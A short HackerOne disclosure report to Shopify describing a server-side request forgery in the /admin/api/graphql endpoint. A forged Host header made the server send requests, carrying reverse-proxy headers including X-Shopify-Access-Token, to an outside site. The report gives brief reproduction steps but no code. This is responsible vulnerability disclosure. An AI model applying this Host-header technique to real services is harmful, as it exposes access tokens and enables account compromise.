Shopify: Reverse Proxy misroute leading to steal X-Shopify-Access-Token header

ID H1:429617
Type hackerone
Reporter ruvlol
Modified 2019-03-14T10:50:35


Hello Shopify team! I found out that on /admin/api/graphql endpoint server fetches content of Host header value (${HTTP_Host} + /admin/api/graphql). If my own host was sent to server, request comes from ██████████or ██████████ (your google cloud cluster). Also I can grab all reverse proxy headers including X-Shopify-Access-Token.

example of such request in base64:


Also it returns response your server got on ${HTTP_Host} + /admin/api/graphql address

How to reproduce: 1. POST /admin/api/graphql with Host pointing to external website 2. As external website owner grab incoming headers.


SSRF, X-Shopify-Access-Token leakage